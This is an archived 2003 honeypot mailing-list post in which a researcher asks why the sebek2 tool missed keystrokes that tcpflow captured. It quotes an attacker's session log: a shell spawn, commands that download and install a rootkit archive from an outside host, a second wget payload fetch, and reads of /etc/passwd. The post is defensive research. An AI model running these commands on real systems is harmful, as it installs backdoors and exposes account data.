Honeypots mailing list archives

keystroke recording

From: Shibuya Yoshihiro <yashibu () sfc keio ac jp>
Date: Tue, 02 Sep 2003 03:03:54 +0900

Hi, I am deploying GenII Honeypot and recording attacks by using sebek2.
And I got some keystroke but I found some keystrokes which sebek2 cannot
record. I also using tcpflow, tcpflow recorded attack scripts and after
keystrokes.

Follow is scripts which tcpflow got (Sebek2 cannot records)

--- tcpflow log start ---

(Buffer overflow attack scripts)
TERM=xterm; export TERM=xterm; exec bash -i

lynx -source http://debbyzalina.com/exploits/tools/shv4.tar.gz >
shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup cyber2002x 51437
;uname -a; id;

caat /etc/hosts
cd /tmp
ls -a
cat /etc/*ease
cat /etc/passwd
cat /etc/*ease
wget http://e-wac.tripod.com/panjie/huhuy
k a0
ls -
cat /etc/hosts

--- tcpflow log end ---

I caught 50 times such a attack-keystroke sets for port443(apache-1.3.20) in
4 days, and an attacker made some accounts, login honeypot, so I could
get sebek2 keystroke saving.

Please tell me what mechanism of keystroke saving (including scbek2
mechanism).

Regards.